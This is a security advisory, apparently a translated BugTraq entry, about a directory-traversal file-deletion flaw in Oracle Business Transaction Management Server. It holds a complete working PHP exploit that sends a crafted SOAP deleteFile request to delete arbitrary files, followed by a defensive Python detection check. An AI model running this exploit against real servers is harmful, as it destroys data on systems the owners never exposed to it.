Oracle Business Transaction Management Server 'deleteFile()' Arbitrary File Deletion Vulnerability

Published: 2012-08-07
Updated: 2012-08-09

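Affected systems:
Oracle Business Transaction Management Server 12.1.0.2.7
Description:
BUGTRAQ ID: 54870

Oracle Business Transaction Management (BTM) provides end-to-end performance monitoring of distributed composite applications and tracks business transactions.

Oracle Business Transaction Management (BTM) 12.1.0.2.7 contains an implementation flaw that allows an attacker to delete arbitrary files on an affected computer by means of directory traversal strings.

<*Source: rgod (rgod@autistici.org)*>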

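Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

rgod (rgod@autistici.org) provided the following test method: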


<?php
/*
Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService
Remote File Deletion poc

tested against: Microsoft Windows Server 2003 r2 sp2
                Oracle WebLogic Server 12c (12.1.1)
                Oracle Business Transaction Management Server 12.1.0.2.7 (Production version)

Example:
C:\php>php 9sg_ora2.php 192.168.2.101 boot.ini

C:\php>php 9sg_ora2.php 192.168.2.101 windows\system32\win.ini

rgod
*/
    error_reporting(E_ALL ^ E_NOTICE);    
    set_time_limit(0);
    
    $err[0] = "[!] This script is intended to be launched from the cli!";
    $err[1] = "[!] You need the curl extension loaded!";

    if (php_sapi_name() <> "cli") {
        die($err[0]);
    }
    
    function syntax() {
       print("usage: php 9sg_ora2.php [ip_address] [file_to_delete]\r\n" );
       die();
    }
    
    $argv[2] ? print("[*] Attacking...\n") :
    syntax();
    
    if (!extension_loaded('curl')) {
        $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true :
        false;
        if ($win) {
            !dl("php_curl.dll") ? die($err[1]) :
             print("[*] curl loaded\n");
        } else {
            !dl("php_curl.so") ? die($err[1]) :
             print("[*] curl loaded\n");
        }
    }
        
    function _s($url, $is_post, $ck, $request) {
        global $_use_proxy, $proxy_host, $proxy_port;
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        if ($is_post == 1) {
            curl_setopt($ch, CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $request);
        }
        if ($is_post == 2) {
            curl_setopt($ch, CURLOPT_PUT, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $request);
        }
        
        curl_setopt($ch, CURLOPT_HEADER, 1);
        curl_setopt($ch, CURLOPT_HTTPHEADER, array(
            "Content-Type: text/xml;charset=UTF-8",
            "SOAPAction: \"http://soa.amberpoint.com/deleteFile\"",
                      

        ));
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_USERAGENT, "Jakarta Commons-HttpClient/3.1");
        //curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        //curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_TIMEOUT, 0);
        
        if ($_use_proxy) {
            curl_setopt($ch, CURLOPT_PROXY, $proxy_host.":".$proxy_port);
        }
        $_d = curl_exec($ch);
        if (curl_errno($ch)) {
            //die("[!] ".curl_error($ch)."\n");
        } else {
            curl_close($ch);
        }
        return $_d;
    }
          $host = $argv[1];
          $port = 7001;
          $file = $argv[2];

$soap='<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:int="http://schemas.amberpoint.com/flashtunnel/interfaces" xmlns:typ="http://schemas.amberpoint.com/flashtunnel/types">
   <soapenv:Header/>
   <soapenv:Body>
      <int:deleteFileRequest>
         <int:deleteFile handle="../../../../../../../../../../../../../../../../../../'.$file.'">
            <typ:DeleteFileRequestVersion>
            </typ:DeleteFileRequestVersion>
         </int:deleteFile>
      </int:deleteFileRequest>
   </soapenv:Body>
</soapenv:Envelope>';

$url = "http://$host:$port/btmui/soa/flash_svc/";
$out = _s($url, 1, "", $soap);
print($out."\n");
?>

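Recommendation:
Vendor patch:

Oracle
------
The vendor has not yet provided a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version: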

http://www.oracle.com/technetwork/topics/security/
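
The following Python check is an added example; it is not part of the original advisory, the PoC author's code, or Oracle's product. It inspects a SOAP body sent to the service path shown in the PoC and reports 'deleteFile' handles that contain traversal or an absolute path; the function names, the sample bodies and the benign handle format are assumptions made for illustration.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import unquote

# Namespace, element, attribute and URL path are taken from the PoC request on this page.
NS_INT = "http://schemas.amberpoint.com/flashtunnel/interfaces"
SERVICE_PATH = "/btmui/soa/flash_svc"

def handle_is_suspicious(handle):
    """True if a deleteFile handle contains traversal or an absolute path."""
    decoded = handle
    for _ in range(3):  # peel nested percent-encoding such as %252e
        peeled = unquote(decoded)
        if peeled == decoded:
            break
        decoded = peeled
    normalized = decoded.replace("\\", "/")  # Windows accepts both separators
    return (
        ".." in normalized.split("/")
        or normalized.startswith("/")
        or re.match(r"[A-Za-z]:", normalized) is not None
    )

def inspect_request(path, body):
    """Return the suspicious deleteFile handles in one request to the service."""
    if not path.lower().startswith(SERVICE_PATH):
        return []
    if "<!DOCTYPE" in body or "<!ENTITY" in body:
        return []  # SOAP forbids DTDs; do not expand entities, triage separately
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return []
    handles = (e.get("handle", "") for e in root.iter("{%s}deleteFile" % NS_INT))
    return [h for h in handles if handle_is_suspicious(h)]

def sample_body(handle):
    """Build a constructed SOAP body (not captured traffic) for a given handle."""
    return (
        '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" '
        'xmlns:int="' + NS_INT + '"><soapenv:Body><int:deleteFileRequest>'
        '<int:deleteFile handle="' + handle + '"/></int:deleteFileRequest>'
        "</soapenv:Body></soapenv:Envelope>"
    )

if __name__ == "__main__":
    # The benign handle format below is an assumption, used only for contrast.
    for h in ("upload-1234.tmp", "../../../example.txt"):
        print(h, "->", inspect_request(SERVICE_PATH + "/", sample_body(h)))
```

A check like this belongs in a reverse proxy or request filter in front of the service, where a non-empty result is grounds to reject and log the request. The server-side fix remains resolving the handle to a canonical path and confirming it stays inside the intended directory.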

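This vulnerability entry was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.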